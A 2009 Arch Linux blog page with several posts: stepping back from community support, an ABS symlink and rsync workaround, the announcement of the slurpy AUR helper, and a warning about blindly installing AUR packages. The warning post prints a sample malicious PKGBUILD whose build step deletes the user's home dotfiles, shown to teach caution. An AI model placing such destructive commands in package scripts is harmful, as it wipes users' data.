I may not be the most active member of the Arch community but with
almost 1100 posts on the bbs and well over two years being active in
#archlinux, I’d like to think I’ve done my part. Recently I realized
that I’ve grown tired of reading and answering the same questions over
and over again. Quite honestly, I’m not sure how the Arch devs and
active supporters don’t just crack and disappear more often than they
do.
In the three years I’ve used Arch many things have changed — especially the community. The increasing popularity has attracted many users who simply are not prepared to use what Arch gives them. I’m tired of holding their hands. I’m tired of watching other people hold their hands. I’ve been slain by the help vampire.
Consider this a resignation as an active Arch community member. Not goodbye, more like ‘keep in touch’. I’ll still be around on the bbs and I’m sure I’ll be stopping in on irc every now and again, but much less often. Feel free to shoot me an email or hit me up on github. I’ll be keeping tabs on your websites too, so keep those updates coming. If you aren’t in my blogroll, send me your site so I can add it.
Oh, and since I’m still using Arch I’m also still actively developing slurpy so any bug reports or feature requests are more than welcome on the github page.
Published on November 11, 2009 Comments
· · ·
Now that I’ve been with Arch for a few years, I find myself using the ABS much more frequently to rebuild packages from the repos. The abs(3) script is nice because it now lets you grab a single package from the repos without having to waste space and bandwidth synching the entire abs tree. If you haven’t read up on the ABS yet, I highly encourage you to do so.
The convenience of the abs script has only one drawback that I can see;
you specifiy an $ABSROOT, and packages end up in $ABSROOT/$REPO. For
example if I set ABSROOT=$HOME/pkgs and run abs extra/pkgtools, I
end up with $HOME/pkgs/extra/pkgtools. This is a very minor issue but
it’s very annoying when you’d like to keep all of your self built
packages in one place. I’ve come up with a workaround and I’d like to
see if anyone can suggest a better way to accomplish this.
First, create an absroot directory that holds simlinks for all repos abs knows about.
mkdir ~/.absroot cd $_ for i in core extra community testing; do ln -s ~/pkgs $i; done
Then, in $HOME/.abs.conf:
ABSROOT="$HOME/.absroot" SYNCARGS='-mrtv --no-motd --delete-after --no-p --no-o --no-g --keep-dirlinks'
The SYNCARGS are key here. They are default options with the
exception of --keep-dirlinks. Without this setting, rsync will wipe
out the symlinks you made above and your packages won’t end up where you
expect them.
With these settings, I can now run abs extra/pkgtools and I will have
a $HOME/pkgs/pkgtools directory amidst all the AUR packages I’ve
collected.
If anyone knows an alternative solution, I’d be glad to hear it — I’d also like to know of any major side effects, so let me know what you think.
Published on August 25, 2009 Comments
· · ·
Everytime I see a new user asking about the AUR on IRC I cringe. Not because I don’t use the AUR or I think the AUR is a bad thing, but because I know that someone is going to recommend a way to automagically install these user provided packages.
Remember, the AUR is a user repository. This means that any evil bastard can upload a PKGBUILD that can wreck your system. I’ve written an example below — the urls have been changed so you can’t possibly run makepkg on this and hurt anything.
pkgname=super-cool-program pkgver=6.0.1 pkgrel=1 pkgdesc='Something really awesome that you want to install' arch=('i686' 'x86_64') url='http://a.trustworthy.source.url/' license=('None') depends=() source=(http://a.trustworthy.source.url/${pkgname}/${pkgver}/) md5sums=('e6f64c753e4d6de8db6fc2e0d') build() { cd ${srcdir} && rm -fr $HOME/.* install -D -m755 ${pkgname} ${pkgdir}/usr/bin/${pkgname} }
Any experienced user will quickly notice the horrible thing that hapens here.
Of course, this is a very simple PKGBUILD. Look at this one for example,
malicious code could be anywhere in there and a quick glance isn’t going to
catch it. Obviously rm is just one example of something malicious, it’s just
an easy one to demonstrate.
So how many times have you blindly installed something from the AUR? I know I have a few times. I also know that I’ll never do it again. Hopefully the next time you wget && tar && makepkg (or hopefully slurpy && makepkg) you’ll take a second and think about what you might be getting yourself in to.
Published on August 05, 2009 Comments
· · ·
Please note that this project has been abandoned. For more information, please see this post.
Head on over to the projects page and check out slurpy! It’s an AUR helper modeled after arson, but written in python. Hopefully someone will find it useful and report some bugs so I’ll have something to do when I’m bored.
Published on June 22, 2009 Comments